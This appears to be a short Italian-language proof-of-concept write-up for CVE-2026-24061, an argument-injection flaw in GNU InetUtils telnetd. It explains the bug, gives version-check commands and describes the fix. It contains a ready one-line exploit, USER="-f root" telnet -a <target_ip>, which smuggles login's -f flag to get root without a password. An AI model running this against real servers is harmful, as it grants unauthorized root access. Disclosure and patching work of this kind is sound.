
CVE-2026-24061-PoC
telnetdUna vulnerabilità di iniezione di argomenti colpisce il demone Telnet di GNU InetUtils (telnetd). Una sanificazione insufficiente delle variabili d'ambiente fornite dal client durante la negoziazione NEW_ENVIRON consente a un attaccante di iniettare flag della riga di comando nel processo di login locale, potenzialmente risultando in un bypass dell'autenticazione.
telnetd → /usr/bin/loginGNU InetUtils telnetd 1.9.3 – 2.7 (non corretto).
Durante la negoziazione della sessione, telnetd onora l'opzione Telnet NEW_ENVIRON, che consente a un client di passare variabili d'ambiente come USER al server. Il demone poi interpola questo valore direttamente nella lista di argomenti utilizzata per invocare /usr/bin/login.
Poiché il valore non viene validato per contenere solo caratteri legali per un nome utente, un client può fornire una stringa che inizia con un trattino (-). Invece di essere trattata come un nome utente, questa viene interpretata da login come un flag della riga di comando. A seconda dell'implementazione di login, ciò può abilitare comportamenti come saltare l'autenticazione tramite password (ad es., tramite un flag -f "già autenticato"), portando ad accesso non autorizzato.
Imposta la variabile d'ambiente USER a un valore contenente un flag di opzione prima di connetterti:
USER="-f root" telnet -a <target_ip>
Se il target è vulnerabile, login interpreta -f root come un'istruzione per autenticarsi come root senza password, invece di trattare -f root come un nome utente letterale.
Controlla la versione del pacchetto installato:
Debian / Ubuntu:
dpkg -l | grep inetutils-telnetd
RHEL / CentOS:
rpm -qa | grep inetutils
telnetd rifiuta o rimuove qualsiasi valore USER che inizia con - prima di passarlo a login.